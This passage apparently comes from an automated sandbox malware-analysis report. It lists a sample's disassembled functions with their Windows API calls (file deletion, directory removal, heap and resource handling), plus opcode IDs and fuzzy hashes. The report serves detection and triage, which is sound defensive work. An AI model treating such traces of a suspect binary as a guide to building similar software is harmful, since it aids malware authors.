                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectorywcslenwcsncpy
                                                                              • String ID:
                                                                              • API String ID: 961886536-0
                                                                              • Opcode ID: 358e928ecd82f29180d8c39010668dd472303d741ba965430bb1c2cb3b350df1
                                                                              • Instruction ID: 630a5c6db6187271ae83db4eaeb36511880b8bdc4cdf20ec5a399f16e344c0a7
                                                                              • Opcode Fuzzy Hash: 358e928ecd82f29180d8c39010668dd472303d741ba965430bb1c2cb3b350df1
                                                                              • Instruction Fuzzy Hash: 0F01DBB08113189BCB24DB64CC8DABA7378DF00300F6446BBE455E21D1E77A9AA4DB4A
                                                                              Function 00408D8E Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Initializememset
                                                                              • String ID: ,u
                                                                              • API String ID: 640720207-1962302170
                                                                              • Opcode ID: 4c5f23a674a8f7b46c984437bbca4f970f706a3573d2b0b577e765091421c05e
                                                                              • Instruction ID: 781e80edae316a95334d3837f50a89f25f26191aceb080d9ad1fe250ea93eb12
                                                                              • Opcode Fuzzy Hash: 4c5f23a674a8f7b46c984437bbca4f970f706a3573d2b0b577e765091421c05e
                                                                              • Instruction Fuzzy Hash: 3AE0E6B594030CBBDB409FD0DC0EF9D7B7CE704705F404565F50496181EBB596048B95
                                                                              Function 0040AD60 Relevance: 3.1, APIs: 2, Instructions: 65memoryfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040D438: RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D443
                                                                                • Part of subcall function 0040D438: RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D4BE
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,?,004033A4,00000000,00000000,00000000), ref: 0040AD93
                                                                              • RtlAllocateHeap.NTDLL(00000000,00001000), ref: 0040ADB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocateCreateEnterFileHeapLeave
                                                                              • String ID:
                                                                              • API String ID: 2608263337-0
                                                                              • Opcode ID: 90f7faf706f975316c83b07ac6ced370c6fd09a1887d2f170a25e0c4fd74ef8c
                                                                              • Instruction ID: cb55299900a1a52b407eca00395bc400cfc912b247b49f0a026709af4e8a3faf
                                                                              • Opcode Fuzzy Hash: 90f7faf706f975316c83b07ac6ced370c6fd09a1887d2f170a25e0c4fd74ef8c
                                                                              • Instruction Fuzzy Hash: 0411D031100300ABC2305F5AEC48F57BBAAEFC5761F11863EF5A5A26E0C77698558B69
                                                                              Function 0040DB6A Relevance: 3.1, APIs: 2, Instructions: 61memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040DCBD: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DB7B,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,0041607C,00417090,00000004), ref: 0040DCFE
                                                                              • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD), ref: 0040DB9A
                                                                              • memset.MSVCRT ref: 0040DBD5
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocateFreememset
                                                                              • String ID:
                                                                              • API String ID: 2774703448-0
                                                                              • Opcode ID: dd641588fb5d4f2848f248cc7d9855a33aeab08ce04c044a64c52d6b87a3c813
                                                                              • Instruction ID: 4684dd51efb4be1c7f6cbbcd141334eab977ef2b41965c3d3424e441a95aa271
                                                                              • Opcode Fuzzy Hash: dd641588fb5d4f2848f248cc7d9855a33aeab08ce04c044a64c52d6b87a3c813
                                                                              • Instruction Fuzzy Hash: 8C117C729047149BC320DF49D840A4BBBE8FF98B50F05452EF989A7351D774EC04CBA5
                                                                              Function 0040A970 Relevance: 3.0, APIs: 2, Instructions: 31memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000), ref: 0040A9B3
                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000), ref: 0040A9BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: ChangeCloseFindFreeHeapNotification
                                                                              • String ID:
                                                                              • API String ID: 1642550653-0
                                                                              • Opcode ID: 1101ea52ee8bc232e257b11b4dfa0e022e50a41f92f453deb7857e88e1fe02c5
                                                                              • Instruction ID: 4b594e9f44d889535f58429decad5894e80191ff52abe98a3990b8650259e3e7
                                                                              • Opcode Fuzzy Hash: 1101ea52ee8bc232e257b11b4dfa0e022e50a41f92f453deb7857e88e1fe02c5
                                                                              • Instruction Fuzzy Hash: 45F08272505700ABC7222B99FC05F8BBB72EB91764F12893AF610210F8C7355861DB5D
                                                                              Function 00401FA9 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000000E), ref: 0040DF77
                                                                              • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020,00000001,00000000,00000000,00000064), ref: 00402000
                                                                              • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020,00000001,00000000,00000000,00000064), ref: 0040200B
                                                                                • Part of subcall function 004053C7: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020), ref: 004053D7
                                                                                • Part of subcall function 00405436: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405446
                                                                                • Part of subcall function 00405436: RtlEnterCriticalSection.NTDLL(004176A0), ref: 00405452
                                                                                • Part of subcall function 00405436: RtlLeaveCriticalSection.NTDLL(004176A0), ref: 00405486
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
                                                                              • String ID:
                                                                              • API String ID: 1205394408-0
                                                                              • Opcode ID: a4995793a58d15065b79c121d9b25a2068aad365eb3bcf9e7b176d1495691666
                                                                              • Instruction ID: 98356af5a986153e62a16f1a7b9a52d9cbcc3c42f58cdbaee6b44a4a02fae465
                                                                              • Opcode Fuzzy Hash: a4995793a58d15065b79c121d9b25a2068aad365eb3bcf9e7b176d1495691666
                                                                              • Instruction Fuzzy Hash: D1F0C03155C701AADA257B32DC8299A3F76EB08348B51C43AF851714F2CB3E9C61AE1E
                                                                              Function 0040DDD0 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040DDDC
                                                                              • TlsAlloc.KERNEL32 ref: 0040DDE7
                                                                                • Part of subcall function 0040E600: RtlAllocateHeap.NTDLL(?,00000000,0000000C), ref: 0040E60E
                                                                                • Part of subcall function 0040E600: RtlAllocateHeap.NTDLL(?,00000000,00000010), ref: 0040E622
                                                                                • Part of subcall function 0040E600: TlsSetValue.KERNEL32(0000000E,00000010,?,?,0040DDF7), ref: 0040E64B
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Allocate$AllocCreateValue
                                                                              • String ID:
                                                                              • API String ID: 3361498153-0
                                                                              • Opcode ID: 4e641117bd55311371697391a61bc67f1fb8624d6db014dbb9304ac05d49361e
                                                                              • Instruction ID: 18e5a0edc7d50c2b567692700943758183887443e0587578baab4a09ae3a6d99
                                                                              • Opcode Fuzzy Hash: 4e641117bd55311371697391a61bc67f1fb8624d6db014dbb9304ac05d49361e
                                                                              • Instruction Fuzzy Hash: C9D0127454430467D6002FB1BC0E7843B68B708B46F514C35F619962D1DBB5A000C51C
                                                                              Function 0040A759 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFileAttributesW.KERNEL32(00000002,00000080,0040A792,?,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002,00000000), ref: 0040A770
                                                                              • DeleteFileW.KERNELBASE(00000000,0040A792,?,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000), ref: 0040A77A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesDelete
                                                                              • String ID:
                                                                              • API String ID: 2910425767-0
                                                                              • Opcode ID: d20dcc2b1ea866854d894abaed1435a963998bb33ced13a9451e631658276eaf
                                                                              • Instruction ID: 32816558c3505e2600197b6aa1c8e1867431839d95d1f98e5f62e5383a3a81ae
                                                                              • Opcode Fuzzy Hash: d20dcc2b1ea866854d894abaed1435a963998bb33ced13a9451e631658276eaf
                                                                              • Instruction Fuzzy Hash: ECD06730148301A6D2555B20D90D79A7AB16B80786F15C829B485510F5C778C865E60B
                                                                              Function 0040DE00 Relevance: 3.0, APIs: 2, Instructions: 10memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • HeapDestroy.KERNELBASE(?), ref: 0040DE09
                                                                              • TlsFree.KERNELBASE(0000000E), ref: 0040DE16
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyFreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3293292866-0
                                                                              • Opcode ID: 3f3b1d22445732031eefca4f0308cde2def4a668abbc152b937948c22d9ea38e
                                                                              • Instruction ID: e62e0040ee13618bc64e974affb29b49c4e8111c40791418b11bddbb2c9937d4
                                                                              • Opcode Fuzzy Hash: 3f3b1d22445732031eefca4f0308cde2def4a668abbc152b937948c22d9ea38e
                                                                              • Instruction Fuzzy Hash: 6AC04C75154304AFCB049BA5FC48CA5377DF74C6117468428B61A83661CA35F400CB6C
                                                                              Function 00402BFA Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000000E), ref: 0040DF77
                                                                                • Part of subcall function 00409B40: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00), ref: 00409B51
                                                                              • GetShortPathNameW.KERNEL32(?,?,00002710), ref: 00402C34
                                                                                • Part of subcall function 0040DE20: GetLastError.KERNEL32 ref: 0040DE26
                                                                                • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000000E), ref: 0040DE35
                                                                                • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
                                                                                • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
                                                                                • Part of subcall function 00409B20: HeapFree.KERNEL32(00000000,00000000,00401B6B,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000), ref: 00409B2C
                                                                                • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                                                                • Part of subcall function 0040DEF0: HeapFree.KERNEL32(?,00000000,00000000,?,00000000,?,00411AC4,00000000,00000000,-00000008), ref: 0040DF08
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                                                                              • String ID:
                                                                              • API String ID: 192546213-0
                                                                              • Opcode ID: 49f9ea41b9916b6beaa403a6b7ca882e3139740148ba2b07ebcafa5c299e2020
                                                                              • Instruction ID: acf91f0b192621483340f6d99b68dad878881d8e8b7377b9fd1201c82249adf8
                                                                              • Opcode Fuzzy Hash: 49f9ea41b9916b6beaa403a6b7ca882e3139740148ba2b07ebcafa5c299e2020
                                                                              • Instruction Fuzzy Hash: E10140755086017AD5007BB1DD06D3F7669EFD0718F10C83FB444B90E2CA3C9C55AA5E
                                                                              Function 0040A9E0 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040A9A8,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA07
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 6b8f9e37b353b02e3b6cb8ff0ca601f404a0ed7efcad3d3714d276d4546e1b8c
                                                                              • Instruction ID: 14d3056ca1924aee99cb04667f0b380ac70d83ad29f9bf771d01894620e497e9
                                                                              • Opcode Fuzzy Hash: 6b8f9e37b353b02e3b6cb8ff0ca601f404a0ed7efcad3d3714d276d4546e1b8c
                                                                              • Instruction Fuzzy Hash: CBF09276105700AFD720DF58D948B87B7E8EB58721F10C82EE59AD2690C770E854DB55
                                                                              Function 00402BC1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: InfoNativeSystem
                                                                              • String ID:
                                                                              • API String ID: 1721193555-0
                                                                              • Opcode ID: 2444bb81d38c9911cb4f1a5182d85b53aad325570cca22d2bb76f9bc2955ed15
                                                                              • Instruction ID: 8a645f6298b96527a3a9e5c011dcec852996ed75ec820e929ccd6a5cacf3a2a4
                                                                              • Opcode Fuzzy Hash: 2444bb81d38c9911cb4f1a5182d85b53aad325570cca22d2bb76f9bc2955ed15
                                                                              • Instruction Fuzzy Hash: 5FD0126081824986D750BE75850979BB3ECE704304F60887AE085565C1F7FCE9D99657
                                                                              Function 00409B40 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,00000000,00402F00), ref: 00409B51
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 42056730f6e44905a5b02c626e95f603851e4ed678fa30f00f02d4f5107f6242
                                                                              • Instruction ID: 0e995b311a0039e38a6c1dd281e12789fe5386c316f45d3f47623ba04496a456
                                                                              • Opcode Fuzzy Hash: 42056730f6e44905a5b02c626e95f603851e4ed678fa30f00f02d4f5107f6242
                                                                              • Instruction Fuzzy Hash: 7FC04C713542007AD6519B24AE49F5776A9BB70B42F01C8357655E21A5DB30EC10D728
                                                                              Function 0040D264 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • TlsFree.KERNELBASE(004011D8,004011AA,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 0040D281
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Free
                                                                              • String ID:
                                                                              • API String ID: 3978063606-0
                                                                              • Opcode ID: bb41ee82512545f6e7d13b4e06803ace2dd4b01e4fc7f0f7d78b6f5c3289525c
                                                                              • Instruction ID: 63d9cdb861c42e783f8d559f8bae438e046b2b0141e059cefbd137daa8fd129e
                                                                              • Opcode Fuzzy Hash: bb41ee82512545f6e7d13b4e06803ace2dd4b01e4fc7f0f7d78b6f5c3289525c
                                                                              • Instruction Fuzzy Hash: 2EC00270515500DADF268B49ED0C7D53A71A744315F4589B9D405111F4C3788848DE4C
                                                                              Function 00409AE0 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409AE9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHeap
                                                                              • String ID:
                                                                              • API String ID: 10892065-0
                                                                              • Opcode ID: 32b04c5618a60dd8e1d20f587a5187d242f7e9eed40007270aac00d2dcc3d6b4
                                                                              • Instruction ID: 76b444b78102f1190b75b28dd56e974357e96cc3189ac6b4b6122ebffb005697
                                                                              • Opcode Fuzzy Hash: 32b04c5618a60dd8e1d20f587a5187d242f7e9eed40007270aac00d2dcc3d6b4
                                                                              • Instruction Fuzzy Hash: ACB0127038434056E2110B109C06B803520B304F83F104420F211581D4C7E02000C60C
                                                                              Function 00409AD0 Relevance: 1.5, APIs: 1, Instructions: 3memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • HeapDestroy.KERNELBASE(004011DD,004011AA,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 00409AD6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyHeap
                                                                              • String ID:
                                                                              • API String ID: 2435110975-0
                                                                              • Opcode ID: 399ded8a1eb3f59c66d2f2ff06fdc53af96f34c45b587ce090dbf8798a82475b
                                                                              • Instruction ID: 92ce44880fa00836fd9ec8e9b77f21ccdd2dda276c3d59ffa7e3325814399483
                                                                              • Opcode Fuzzy Hash: 399ded8a1eb3f59c66d2f2ff06fdc53af96f34c45b587ce090dbf8798a82475b
                                                                              • Instruction Fuzzy Hash: B19002305140008FDE435B10ED489843B35F74134170288709022850B0C7255450DB1C

                                                                              Non-executed Functions

                                                                              Function 004026B8 Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000000E), ref: 0040DF77
                                                                              • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000), ref: 004026C9
                                                                              • SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004026D9
                                                                                • Part of subcall function 00409B40: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00), ref: 00409B51
                                                                                • Part of subcall function 00409C20: memcpy.MSVCRT ref: 00409C30
                                                                              • FreeResource.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 00402708
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
                                                                              • String ID:
                                                                              • API String ID: 4216414443-0
                                                                              • Opcode ID: bd44d20d037d9532e60a93529e8716f693fb4c78f82d9fc58d9a64d43f7a450a
                                                                              • Instruction ID: aef506374d55060129c4874ad09f8e19456ab50fe59ad62301b1ec8aa9f30053
                                                                              • Opcode Fuzzy Hash: bd44d20d037d9532e60a93529e8716f693fb4c78f82d9fc58d9a64d43f7a450a
                                                                              • Instruction Fuzzy Hash: 3EF07471408301AFDB01AF61DD0186EBEB1FB98344F108C3EB584621B1D7369969AB9A
                                                                              Function 004098D0 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00409890,0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008), ref: 00409A0C
                                                                              • SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008,00000008), ref: 00409A20
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 8b0f608e405cae46fc8e63b589dbaca7258740b989b39933334343d4a09fb59f
                                                                              • Instruction ID: 2c8fa190a6d032f87ec30cf03d38c93985f91324802676e59826f832aed0a575
                                                                              • Opcode Fuzzy Hash: 8b0f608e405cae46fc8e63b589dbaca7258740b989b39933334343d4a09fb59f
                                                                              • Instruction Fuzzy Hash: 38E0E5B0208341EFC710CF18E948B867BF5B788701F01C43AE445922A5E7348C44EF5D
                                                                              Function 004098F0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(004011C9,004011AA,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 004098F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 31e70d09a190535cfca40eac8151b35d3e49dc34e543f2d84d890ba62a303ae5
                                                                              • Instruction ID: 58fd1e7f992a672593766b16f957b5939387e25e4684d50d9e98353aec796854
                                                                              • Opcode Fuzzy Hash: 31e70d09a190535cfca40eac8151b35d3e49dc34e543f2d84d890ba62a303ae5
                                                                              • Instruction Fuzzy Hash: 96B00178018352DBDB019F14FC0CBC43F72B748715F82C174941141274E7794458DA88
                                                                              Function 004099EC Relevance: .0, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00409890,0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008), ref: 00409A0C
                                                                              • SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,0041606C,00000008,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C,00000008,00000008), ref: 00409A20
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: bad6891cb122df9e49b9d6ad62101fe9d028c943d09aafdc847ac0a0c5047257
                                                                              • Instruction ID: 407f328c64b279026553c54bcc55a3ba3d796e968f6632f773714a3d8d8c274d
                                                                              • Opcode Fuzzy Hash: bad6891cb122df9e49b9d6ad62101fe9d028c943d09aafdc847ac0a0c5047257
                                                                              • Instruction Fuzzy Hash: 5CC00230209382EFD7248F14A58479677A5A785741F05C43AD04596296D378CC46DF69
                                                                              Function 00408F09 Relevance: 63.3, APIs: 31, Strings: 5, Instructions: 270windowregistrymemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00408DF8: wcslen.MSVCRT ref: 00408E04
